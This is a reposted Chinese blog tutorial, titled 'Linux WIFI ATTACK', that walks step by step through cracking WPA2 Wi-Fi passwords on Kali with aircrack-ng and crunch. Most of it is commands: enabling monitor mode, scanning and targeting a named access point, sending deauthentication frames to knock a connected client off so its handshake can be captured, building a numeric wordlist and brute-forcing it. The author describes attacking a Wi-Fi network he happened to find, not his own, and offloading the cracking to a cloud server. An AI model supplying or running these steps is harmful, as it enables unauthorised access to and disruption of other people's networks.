zoukankan      html  css  js  c++  java
  • Linux WIFI ATTACK

    {

    https://github.com/conwnet/wpa-dictionary
    http://www.360doc.com/content/18/0827/09/52701931_781512408.shtml
    https://www.cnblogs.com/a986771570/p/6210925.html

    }

    {

      //build password

      //abcdefghijklmnopqrstuvwxyz0123456789

      crunch 10 10 0123 -o ./password.txt

      sudo su

      airmon-ng start

      //wlan0mon or other

      //listen

      airodump-ng wlan0mon

      //open terminal

      //ch  + mac

      sudo su

      airodump-ng -c  ch  --bssid mac wlan0mon

      

      aireplay-ng -0 2 -a mac -c mac wlan0mon

      

      aircrack-ng -w password.txt *.cap

    }

    {

    操作环境:kali

    使用工具:aircrack-ng,crunch

        在家里闲来无事,便研究了一下怎么破解wifi密码,也算有点成就感.本文章争取通俗笼统,尽量保证让新手也能看懂,当然完全没Linux基础还是先去坐着吧。

    不要对其中的命令死记硬背,先要把原理和步骤搞清楚

    开始:


     

    1.打开WIFI,但是要断开wifi连接,防止后面出现错误

    2.airmon-ng  查看支持监控(moniter)的网卡,我的是wlan0,每个人可能会不同,按你的实际名称来(图1)

    图1

    3.airmon-ng start wlan0  开启该网卡监控模式(moniter),网卡名称变为wlan0mon,之后写网卡名称时不要错写成wlan0!我用airmon-ng命令重新确认了一下(图2)

    图2

    4.airodump-ng wlan0mon  使用该网卡开始扫描,显示一大批wifi热点,都是WPA2 加密模式,差不多选择完目标后可选择Ctrl+c停止扫描(图3)

    图3

    5.airodump --bssid   该wifi的bssid   --channel  该wifi的信道   --write  把捕获的包放到哪里    wlan0mon  (图4)

    例如我选择第一个xiaomi则输入

    airodump --bssid 34:80:B3:3C:FD:49  --channel  6  --write  xiaomi  wlan0mon    (建议先创建一个目录,在该目录下运行此命令)

    图4

    6.发现连接该wifi的有一台设备,我们需要获取该wifi的用户认证包,你可以一直等他下次重新上线,当然我们没那么有耐心,于是就有了下一个命令aireplay-ng(图4)

    7.aireplay-ng -0 3 -a  该wifi的bssid   -c 连接该wifi的用户设备station  wlan0mon  (图5右侧)

    (-0表示发送解除认证,让该设备重新连接以获取认证包,3表示发送3次,当该数为0时表示无限次,-a表示access point,-c表示client)

    图5

    运行该命令后图5左边窗口出现 【WPA handshake:......】说明抓到了认证包,可以与图4对比一下。完成之后记得用 airmon-ng stop wlan0mon 关闭网卡监听模式!

    8.此步骤为额外步骤,可不进行。

    我用wireshark打开捕获的包xiao.cap,点Protoco进行分类,确实发现了认证包

    图6

    9.有了认证包之后,我们破解还需要字典,一般人密码会用八位数字组成,于是我用crunch创建8位纯数字组成的字典,有837MB大小,对crunch工具不了解的自行百度

    crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o wordlist.txt

    调用密码库文件 charset.lst, 生成最小为8,最大为8,元素为密码库 charset.lst中 numeric的项目,并保存为 wordlist.txt;其中 charset.lst在kali_linux的目录 为 /usr/share/crunch/charset.lst, -o:用于指定输出字典文件的位置。

    >想了解更多可以vim  /usr/share/crunch/charset.lst 查看所有密码库

    图7

    10.aircrack-ng    捕获的.cap包   -w 密码字典

    图8

    11.额外步骤,可不进行。

    因为是自己随便找的wifi,所以用暴力破解看运气,很耗时间,所以我干脆把他放到租的云服务器里让他自个去运行,反正现在云服务器很便宜,用上screen命令让其在用户退出登陆时继续运行(不了解screen工具的自行百度,一个很好用的工具)



    作者:颜科鸣_5482
    链接:https://www.jianshu.com/p/893cc1224d34
    来源:简书
    著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

    }

  • 相关阅读:
    Java网络编程
    loj#6517. 「雅礼集训 2018 Day11」字符串(回滚莫队)
    bzoj4241: 历史研究(回滚莫队)
    洛谷P5050 【模板】多项式多点求值
    loj#6053. 简单的函数(Min_25筛)
    【BZOJ4144】[AMPPZ2014]Petrol(最短路+最小生成树+并查集)
    51nod 1781 Pinball(线段树)
    CF1110D Jongmah
    CF1106F Lunar New Year and a Recursive Sequence(矩阵快速幂+bsgs+exgcd)
    20. Valid Parentheses
  • 原文地址:https://www.cnblogs.com/YZFHKMS-X/p/12927308.html
Copyright © 2011-2022 走看看